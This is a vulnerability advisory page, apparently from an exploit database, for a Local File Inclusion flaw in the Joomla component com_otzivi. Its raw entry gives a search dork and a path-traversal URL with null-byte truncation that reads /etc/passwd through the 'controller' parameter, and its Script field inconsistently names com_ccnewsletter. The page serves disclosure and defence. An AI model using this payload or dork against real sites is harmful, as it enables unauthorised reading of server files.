Joomla Component com_otzivi Local File Inclusion

vendor:

Joomla Component com_otzivi

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

Local File Inclusion [LFI]

CWE

Product Name: Joomla Component com_otzivi

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_otzivi Local File Inclusion

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can use the ‘controller’ parameter to inject malicious code into the application. This code can be used to read sensitive files from the server.

Mitigation:

The best way to mitigate this vulnerability is to validate user input and filter out any malicious code.

Source

Exploit-DB raw data:

Joomla Component com_otzivi Local File Inclusion
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : Joomla Component com_ccnewsletter
.:. Bug Type       : Local File Inclusion [LFI]
.:. Dork           : inurl:"com_otzivi"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_otzivi&controller=[LFI]
www.site.com/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00

####################################################################